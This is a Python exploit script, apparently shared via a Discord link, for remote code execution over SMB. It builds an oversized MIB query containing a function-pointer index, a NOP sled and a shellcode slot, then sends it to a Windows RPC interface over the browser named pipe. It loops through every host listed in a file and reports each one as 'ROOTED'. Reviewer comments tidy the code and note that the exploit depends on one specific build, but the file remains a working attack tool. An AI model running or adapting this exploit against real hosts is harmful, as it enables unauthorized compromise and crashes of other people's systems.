- #DISCORD: https://discord.gg/PTW3yPp
- import struct
- import sys
- import time
- import os
- from threading import Thread
- from impacket import smb
- from impacket import uuid
- from impacket import dcerpc
- from impacket.dcerpc.v5 import transport
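# NOTE(review): placeholder payload -- replace with the real shellcode bytes.
# The request body below reserves exactly PAYLOAD_SLOT bytes for it (after a
# 5-byte address and 5 NOPs), and the length check further down rejects
# anything larger. This script is Python 2 (the original uses a print
# statement), so these str literals are byte strings; under Python 3 they
# would have to become b"..." before impacket will send them.
buf = "shellcode line1"
buf += "shellcode line2"

# Size of the rgdwVarIndex field of the _MIB_OPAQUE_QUERY below, and the part
# of it left for `buf` once the leading 5-byte address and the 5 NOPs are taken.
VAR_INDEX_SIZE = 100000
PAYLOAD_SLOT = VAR_INDEX_SIZE - 10
if len(buf) > PAYLOAD_SLOT:
    # The original padded with "\x41" * (PAYLOAD_SLOT - len(buf)); for an
    # oversized payload that product is negative, the padding silently becomes
    # "", and the body no longer matches the dwMibInEntrySize / dwMibOutEntrySize
    # headers (0x186a4 = 100004 = 4 bytes dwVarID + 100000 bytes rgdwVarIndex).
    # Fail loudly instead of sending a malformed request.
    raise ValueError("payload is %d bytes but only %d fit in the stub"
                     % (len(buf), PAYLOAD_SLOT))

#DO NOT REMOVE THIS
# Request body for opnum 0x1e. Every header field is a little-endian DWORD;
# "\x41" fills fields whose value does not matter to the request.
# NOTE(review): the dwVarID written into ECX and the 5 address bytes that open
# rgdwVarIndex are, per the original author's own annotations, an index into a
# function-pointer table and the location it should land on -- i.e. they are
# tied to one specific build of the target module. Against any other build the
# most likely outcome is a crash of the target service, not code execution,
# and nothing in this script fingerprints the target before sending.
stub = "\x21\x00\x00\x00"            # dwPid = PID_IP (IPv4)
stub += "\x10\x27\x00\x00"           # dwRoutingPID (0x2710)
stub += "\xa4\x86\x01\x00"           # dwMibInEntrySize (0x186a4 = 100004)
stub += "\x41" * 4                   # _MIB_OPAQUE_QUERY pointer
stub += "\x04\x00\x00\x00"           # dwVarID (_MIB_OPAQUE_QUERY)
stub += "\x41" * 4                   # rgdwVarIndex (_MIB_OPAQUE_QUERY)
stub += "\xa4\x86\x01\x00"           # dwMibOutEntrySize (0x186a4 = 100004)
stub += "\xad\x0b\x2d\x06"           # dwVarID -> ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX
stub += ("\xd0\xba\x61\x41\x41"      # rgdwVarIndex: 5 address bytes,
         + "\x90" * 5                # 5-byte NOP sled,
         + buf                       # the payload,
         + "\x41" * (PAYLOAD_SLOT - len(buf)))  # and fill to exactly VAR_INDEX_SIZE bytes
stub += "\x04\x00\x00\x00"           # dwId (_MIB_OPAQUE_INFO)
stub += "\x41" * 4                   # ullAlign (_MIB_OPAQUE_INFO)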
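# String binding template: SMB named pipe \pipe\browser on the target host.
PIPE_BINDING = 'ncacn_np:%s[\\pipe\\browser]'
# Interface UUID / version and opnum the stub is sent to (from the original call).
IFACE_UUID = ('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')
OPNUM = 0x1e


def _binding_for(target):
    """Return the ncacn_np string binding for one host read from the target file.

    The line is stripped first. The original interpolated the raw line,
    trailing newline included, into the binding, so every host except the
    last (newline-less) line of the file carried "\\n" in its network
    address and presumably failed to resolve.
    """
    return PIPE_BINDING % target.strip()


def _send_stub(target, stub):
    """Connect to *target* over SMB, bind IFACE_UUID and send *stub* at OPNUM.

    Raises whatever impacket raises on connect/bind/call; the caller decides
    how to report it. The transport is disconnected in all cases, so a long
    target list no longer leaks one socket per failed host (the original only
    dropped the Python references with `del`).

    NOTE(review): returning from this function only means the call did not
    raise -- the request was accepted by the transport. It is not evidence the
    payload ran; the "[+] ROOTED" message printed by the caller overstates it.
    """
    print("Attempting Connection")
    trans = transport.DCERPCTransportFactory(_binding_for(target))
    trans.connect()
    try:
        print("[+] Connected Successfully!")
        dce = trans.DCERPC_class(trans)
        dce.bind(uuid.uuidtup_to_bin(IFACE_UUID))
        dce.call(OPNUM, stub)
    finally:
        trans.disconnect()


def _attack_all(path, stub):
    """Send *stub* to every host listed in *path* (one host per line).

    Blank lines are skipped (the original would have tried to connect to "").
    A failure on one host is reported with its reason and the sweep continues;
    KeyboardInterrupt is not caught, unlike the original bare `except:`, so
    Ctrl-C actually stops the run. Returns the number of hosts attempted.
    """
    attempted = 0
    with open(path) as fp:
        for cnt, line in enumerate(fp):
            target = line.strip()
            if not target:
                continue
            attempted += 1
            print("[%d] Attacking ---> %s" % (cnt, target))
            try:
                _send_stub(target, stub)
                print("[+] ROOTED | Exploit Sent Successfully")
            except Exception as exc:  # per-host failure must not abort the sweep
                print("[+] :( NO ROOT")
                print("    reason: %s: %s" % (type(exc).__name__, exc))
    return attempted


if __name__ == "__main__":
    _attack_all("bios.txt", stub)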